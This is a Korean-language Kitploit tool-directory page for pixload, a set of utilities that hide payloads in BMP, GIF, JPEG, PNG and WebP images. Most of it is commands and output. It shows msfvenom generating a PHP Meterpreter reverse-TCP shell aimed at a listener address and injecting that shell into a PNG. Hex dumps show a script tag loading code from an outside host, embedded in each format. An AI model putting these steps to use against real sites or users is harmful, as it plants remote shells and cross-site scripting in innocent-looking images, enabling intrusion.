Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
pixload — 이미지 페이로드 생성/주입 도구 | Kitploit
도구/GitHubGitHub/sighook/pixload
Payload GenerationWeb Application ExploitationSteganographyPayload Development
GitHubsighook/pixload

pixload

이미지 페이로드 생성/주입 도구

저장소 보기
1.3k252163년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

pixload -- 이미지 페이로드 생성 도구

설명

이미지에 페이로드를 백도어 숨기기 생성/주입하기 위한 도구 세트.

현재 지원되는 이미지 형식: BMP, GIF, JPG, PNG, WebP.

정보

pixload와 그 사용 사례를 더 잘 이해하기 위한 유용한 참고 자료:

  • 폴리글롯 JPEG을 사용한 CSP 우회

  • 폴리글롯 이미지를 사용해 멀버타이징 공격을 숨기는 해킹 그룹

  • PNG IDAT 청크에 웹 셸 인코딩

  • PNG 및 이상한 콘텐츠 유형을 통한 Facebook XSS

  • PNG IDAT 청크의 XSS 페이로드 재검토

결과 바이너리 블롭이 유효한 x86 셸코드이면서 동시에 유효한 이미지 파일이 되도록 페이로드를 인코딩하려면 다음 여기와 여기를 참조하는 것을 권장합니다.

msfvenom

metasploit 페이로드를 주입하려면 다음과 같이 해야 합니다:

  1. metasploit 페이로드 생성 (예: php).
root@kitploit:~
$ msfvenom -p php/meterpreter_reverse_tcp \
	LHOST=192.168.0.1 LPORT=31337 -f raw 2>/dev/null > payload.php
  1. 필요한 경우 payload.php를 편집합니다.

  2. payload.php를 이미지에 주입 (예: png).

root@kitploit:~
$ pixload-png --payload "$(cat payload.php)" payload.png

설정

의존성

다음 Perl 모듈이 필요합니다:

  • GD

  • Image::ExifTool

  • String::CRC32

Debian 기반 시스템에서는 다음 패키지를 설치하세요:

root@kitploit:~
sudo apt install libgd-perl libimage-exiftool-perl libstring-crc32-perl

FreeBSD 및 DragonFlyBSD에서는 다음 패키지를 설치하세요:

root@kitploit:~
doas pkg install p5-GD p5-Image-ExifTool p5-String-CRC32

OSX에서는 이 해결 방법을 참조하세요 (@iosdec 감사).

빌드 및 설치
root@kitploit:~
make install

Docker

root@kitploit:~
docker build -t pixload .
docker run -v "$(pwd):/pixload" -it --rm pixload

도구

pixload-bmp

도움말
root@kitploit:~
$ pixload-bmp --help
root@kitploit:~
Usage: pixload-bmp [OPTION]... FILE
Hide Payload/Malicious Code in BMP Images.

Mandatory arguments to long options are mandatory for short options too.
  -P, --payload STRING   set payload for injection
  -v, --version          print version and exit
  -h, --help             print help and exit

If the output FILE already exists, then payload will be injected into this
existing file. Otherwise, the new one will be created.
예제
root@kitploit:~
$ pixload-bmp payload.bmp
root@kitploit:~
...... BMP Payload Creator/Injector ......
..........................................
... https://github.com/sighook/pixload ...
..........................................

[>] Generating output file
[✔] File saved to: payload.bmp

[>] Injecting payload into payload.bmp
[✔] Payload was injected successfully

payload.bmp: PC bitmap, OS/2 1.x format, 1 x 1 x 24, cbSize 10799, bits offset 26

00000000  42 4d 2f 2a 00 00 00 00  00 00 1a 00 00 00 0c 00  |BM/*............|
00000010  00 00 01 00 01 00 01 00  18 00 00 00 ff 00 2a 2f  |..............*/|
00000020  3d 31 3b 3c 73 63 72 69  70 74 20 73 72 63 3d 2f  |=1;<script src=/|
00000030  2f 65 78 61 6d 70 6c 65  2e 63 6f 6d 3e 3c 2f 73  |/example.com></s|
00000040  63 72 69 70 74 3e 3b                              |cript>;|
00000047

자세한 정보는 pixload-bmp(1) 매뉴얼 페이지를 참조하세요.

pixload-gif

도움말
root@kitploit:~
$ pixload-gif --help
root@kitploit:~
Usage: pixload-gif [OPTION]... FILE
Hide payload/malicious code in GIF images.

Mandatory arguments to long options are mandatory for short options too.
  -W, --pixelwidth  INTEGER   (has no effect)
                              set pixel width for the new image (default: 10799)
  -H, --pixelheight INTEGER   set pixel height for the new image (default: 32)
  -P, --payload     STRING    set payload for injection
  -v, --version               print version and exit
  -h, --help                  print help and exit

The option -W, --pixelwidth has no effect since pixload-gif rewrites
pixel width bytes with "/*" characters, to prepare the polyglot gif image.

If the output FILE already exists, then the payload will be injected into this
existing file. Otherwise, the new one will be created with specified pixels
wide.
예제
root@kitploit:~
$ pixload-gif payload.gif
root@kitploit:~
...... GIF Payload Creator/Injector ......
..........................................
... https://github.com/sighook/pixload ...
..........................................

[>] Generating output file
[✔] File saved to: payload.gif

[>] Injecting payload into payload.gif
[✔] Payload was injected successfully

payload.gif: GIF image data, version 87a, 10799 x 32

00000000  47 49 46 38 37 61 2f 2a  20 00 80 00 00 04 02 04  |GIF87a/* .......|
00000010  00 00 00 2c 00 00 00 00  20 00 20 00 00 02 1e 84  |...,.... . .....|
00000020  8f a9 cb ed 0f a3 9c b4  da 8b b3 de bc fb 0f 86  |................|
00000030  e2 48 96 e6 89 a6 ea ca  b6 ee 0b 9b 05 00 3b 2a  |.H............;*|
00000040  2f 3d 31 3b 3c 73 63 72  69 70 74 20 73 72 63 3d  |/=1;<script src=|
00000050  2f 2f 65 78 61 6d 70 6c  65 2e 63 6f 6d 3e 3c 2f  |//example.com></|
00000060  73 63 72 69 70 74 3e 3b                           |script>;|
00000068

자세한 정보는 pixload-gif(1) 매뉴얼 페이지를 참조하세요.

pixload-jpg

도움말
root@kitploit:~
$ pixload-jpg --help
root@kitploit:~
Usage: pixload-jpg [OPTION]... FILE
Hide Payload/Malicious Code in JPEG images.

Mandatory arguments to long options are mandatory for short options too.
  -S, --section COM|DQT         set section for payload injection
  -P, --payload STRING          set payload for injection
  -v, --version                 print version and exit
  -h, --help                    print help and exit

If the output FILE already exists, then payload will be injected into this
existing file. Otherwise, the new one will be created.
예제
  1. 주석 섹션에 페이로드 주입:
root@kitploit:~
$ pixload-jpg -S com payload.jpg
root@kitploit:~
..... JPEG Payload Creator/Injector ......
..........................................
... https://github.com/sighook/pixload ...
..........................................

[>] Generating output file
[✔] File saved to: payload.jpg

[>] Injecting payload into COMMENT
[✔] Payload was injected successfully

payload.jpg: JPEG image data, progressive, precision 8, 1x1, components 1

00000000  ff d8 ff fe 00 25 3c 73  63 72 69 70 74 20 73 72  |.....%<script sr|
00000010  63 3d 2f 2f 65 78 61 6d  70 6c 65 2e 63 6f 6d 3e  |c=//example.com>|
00000020  3c 2f 73 63 72 69 70 74  3e ff db 00 43 00 01 01  |</script>...C...|
00000030  01 01 01 01 01 01 01 01  01 01 01 01 01 01 01 01  |................|
*
00000060  01 01 01 01 01 01 01 01  01 01 01 01 01 01 ff c2  |................|
00000070  00 0b 08 00 01 00 01 01  01 11 00 ff c4 00 14 00  |................|
00000080  01 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00000090  03 ff da 00 08 01 01 00  00 00 01 3f ff d9        |...........?..|
0000009e
  1. DQT 테이블에 페이로드 주입:
root@kitploit:~
$ pixload-jpg -S dqt payload.jpg
root@kitploit:~
..... JPEG Payload Creator/Injector ......
..........................................
... https://github.com/sighook/pixload ...
..........................................

[>] Generating output file
[✔] File saved to: payload.jpg

[>] Injecting payload into DQT table
[✔] Payload was injected succesfully

payload.jpg: JPEG image data, progressive, precision 8, 1x1, components 1

00000000  ff d8 ff db 00 43 00 01  01 01 01 01 01 01 01 01  |.....C..........|
00000010  01 01 01 01 01 01 01 01  01 01 01 01 01 01 01 01  |................|
00000020  01 01 01 01 3c 73 63 72  69 70 74 20 73 72 63 3d  |....<script src=|
00000030  2f 2f 65 78 61 6d 70 6c  65 2e 63 6f 6d 3e 3c 2f  |//example.com></|
00000040  73 63 72 69 70 74 3e ff  c2 00 0b 08 00 01 00 01  |script>.........|
00000050  01 01 11 00 ff c4 00 14  00 01 00 00 00 00 00 00  |................|
00000060  00 00 00 00 00 00 00 00  00 03 ff da 00 08 01 01  |................|
00000070  00 00 00 01 3f ff d9 01  01 11 00 ff c4 00 14 00  |....?...........|
00000080  01 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00000090  03 ff da 00 08 01 01 00  00 00 01 3f ff d9        |...........?..|
0000009e

자세한 정보는 pixload-jpg(1) 매뉴얼 페이지를 참조하세요.

pixload-png

도움말
root@kitploit:~
$ pixload-png --help
root@kitploit:~
Usage: pixload-png [OPTION]... FILE
Hide Payload/Malicious Code in PNG Images.

Mandatory arguments to long options are mandatory for short options too.
  -W, --pixelwidth  INTEGER   set pixel width for the new image (default: 32)
  -H, --pixelheight INTEGER   set pixel height for the new image (default: 32)
  -P, --payload STRING        set payload for injection
  -v, --version               print version and exit
  -h, --help                  print help and exit

If the output FILE already exists, then payload will be injected into this
existing file. Else, the new one will be created with specified pixels wide.
예제
root@kitploit:~
$ pixload-png payload.png
root@kitploit:~
...... PNG Payload Creator/Injector ......
..........................................
... https://github.com/sighook/pixload ...
..........................................

[>] Generating output file
[✔] File saved to: payload.png

[>] Injecting payload into payload.png

[+] Chunk size: 13
[+] Chunk type: IHDR
[+] CRC: fc18eda3
[+] Chunk size: 9
[+] Chunk type: pHYs
[+] CRC: 952b0e1b
[+] Chunk size: 25
[+] Chunk type: IDAT
[+] CRC: c8a288fe
[+] Chunk size: 0
[+] Chunk type: IEND

[>] Inject payload to the new chunk: 'pUnk'
[✔] Payload was injected successfully

payload.png: PNG image data, 32 x 32, 8-bit/color RGB, non-interlaced

00000000  89 50 4e 47 0d 0a 1a 0a  00 00 00 0d 49 48 44 52  |.PNG........IHDR|
00000010  00 00 00 20 00 00 00 20  08 02 00 00 00 fc 18 ed  |... ... ........|
00000020  a3 00 00 00 09 70 48 59  73 00 00 0e c4 00 00 0e  |.....pHYs.......|
00000030  c4 01 95 2b 0e 1b 00 00  00 19 49 44 41 54 48 89  |...+......IDATH.|
00000040  ed c1 31 01 00 00 00 c2  a0 f5 4f ed 61 0d a0 00  |..1.......O.a...|
00000050  00 00 6e 0c 20 00 01 c8  a2 88 fe 00 00 00 00 49  |..n. ..........I|
00000060  45 4e 44 ae 42 60 82 00  00 00 00 00 00 00 00 00  |END.B`..........|
00000070  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
000000c0  00 23 50 55 6e 4b 3c 73  63 72 69 70 74 20 73 72  |.#PUnK<script sr|
000000d0  63 3d 2f 2f 65 78 61 6d  70 6c 65 2e 63 6f 6d 3e  |c=//example.com>|
000000e0  3c 2f 73 63 72 69 70 74  3e eb fd 2e 9f 00 49 45  |</script>.....IE|
000000f0  4e 44                                             |ND|
000000f2

자세한 정보는 pixload-png(1) 매뉴얼 페이지를 참조하세요.

pixload-webp

도움말
root@kitploit:~
$ pixload-webp --help
root@kitploit:~
Usage: pixload-webp [OPTION]... FILE
Hide payloads/malicious code in WebP images.

Mandatory arguments to long options are mandatory for short options too.
  -P, --payload STRING   set payload for injection
  -v, --version          print version and exit
  -h, --help             print help and exit

Currently, there is no possibility to inject the payload into an existing
WebP image. Only the new (minimal) WebP image will be created and your
payload will be injected into. If the output FILE already exists, the
payload will be injected into the existing image, but this image will be
corrupted.
예제
root@kitploit:~
$ pixload-webp payload.webp
root@kitploit:~
..... WebP Payload Creator/Injector ......
..........................................
... https://github.com/sighook/pixload ...
..........................................

[>] Generating output file
[✔] File saved to: payload.webp

[>] Injecting payload into payload.webp
[✔] Payload was injected successfully

payload.webp: RIFF (little-endian) data, Web/P image

00000000  52 49 46 46 2f 2a 00 00  57 45 42 50 56 50 38 4c  |RIFF/*..WEBPVP8L|
00000010  ff ff ff 00 2f 00 00 00  10 07 10 11 11 88 88 fe  |..../...........|
00000020  07 00 2a 2f 3d 31 3b 3c  73 63 72 69 70 74 20 73  |..*/=1;<script s|
00000030  72 63 3d 2f 2f 65 78 61  6d 70 6c 65 2e 63 6f 6d  |rc=//example.com|
00000040  3e 3c 2f 73 63 72 69 70  74 3e 3b                 |></script>;|
0000004b

자세한 정보는 pixload-webp(1) 매뉴얼 페이지를 참조하세요.

라이선스

WTFPL 버전 2. 자세한 내용은 LICENSE를 참조하세요.

법적 고지

저자는 이 도구의 잘못된 사용에 대해 어떠한 책임도 지지 않습니다. 사전 동의 없이 대상을 공격하는 것은 불법이며 법에 의해 처벌된다는 점을 기억하세요.

기부

  • BTC: bc1qj4g98svq6qh3q2ap37v52nsvusa76c3cnmcdmx

  • PAYPAL: [email protected]

매우 감사드립니다.

도구 다운로드